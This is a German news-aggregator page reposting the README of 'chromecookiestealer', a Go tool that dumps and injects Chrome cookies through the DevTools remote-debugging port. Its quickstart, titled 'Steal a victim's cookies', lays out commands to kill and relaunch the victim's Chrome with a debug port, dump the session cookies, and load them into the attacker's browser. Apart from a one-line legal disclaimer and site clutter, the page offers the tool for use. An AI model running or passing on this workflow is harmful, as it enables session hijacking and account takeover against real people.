Heavily inspired by . The same format is used for cookies to be loaded.
For legal use only.
into (another instance of) ChromeQuickstart
Steal a victim's cookies:
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.jsonInject into the attacker's local browser:
# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.jsonUsage
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome remote Protocol is a bit of a moving target. It may be necessary to use a newer version of the libraries should this program stop working. This can be done with CODE go get -u -v all
go mod tidy
go build
which could well have the side-effect of breaking everything else.
¯\_(ツ)_/¯
Vollständiges Original-Advisory Ausführliche Details, Exploit-Analyse & Hersteller-Stellungnahme auf kitploit.com. ↗ Original-Artikel auf kitploit.com lesen Community-Analysen & Experten-Meinungen 0
Verwandte Story-Cluster & Quellen (Vektor-KI)
Ähnliche Beiträge
Auch interessante Nachrichten Chromecookiestealer - Steal/Inject Chrome Cookies Over The DevTools Protocol
Thematisch verwandte Begriffe: Chromecookiestealer, StealInject, Chrome, Cookies · 6 Treffer
Hermes Agent auf einem VPS einrichten: 24/7 Linux-Server-Guide
Docker GPU Passthrough einrichten: NVIDIA-GPU in Docker-Containern nutzen
Best early October Prime Day 2026 all-in-one computer deals: HP, Lenovo, Dell, and more
KDE launches new merch store, first product is a Konqi plushy!
Videos werden geladen ...
Beiträge werden geladen ...
Videos werden geladen ...
Beiträge werden geladen ...
Videos werden geladen ...
Beiträge werden geladen ...
Videos werden geladen ...
Beiträge werden geladen ...
Videos werden geladen ...
SOCIAL SHARE CARD GENERATOR